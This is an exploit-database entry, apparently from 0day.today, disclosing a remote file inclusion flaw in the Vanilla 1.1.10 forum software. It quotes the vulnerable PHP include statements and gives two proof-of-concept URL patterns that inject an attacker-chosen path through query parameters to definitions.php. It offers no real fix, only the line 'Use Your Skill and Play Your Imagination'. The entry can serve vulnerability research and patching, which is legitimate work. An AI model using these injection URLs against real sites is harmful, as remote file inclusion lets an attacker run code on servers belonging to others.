Vanilla 1.1.10 <= Remote File Inclusion Vulnerability

2010-03-22T00:00:00
ID 1337DAY-ID-11395
Type zdt
Reporter eidelweiss
Modified 2010-03-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
=====================================================

Title: Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
Version: 1.1.10
link: http://php.opensourcecms.com/scripts/redirect/website.php?id=128
License: -

########################################################

Author: eidelweiss
Date: 2010/03/22
Contact: eidelweiss[at]cyberservices.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
 Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
Special Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)

########################################################

-=[ VULN ]=-

[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');

[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');

-=[ P0C ]=-

[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]

################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################



#  0day.today [2018-02-05]  #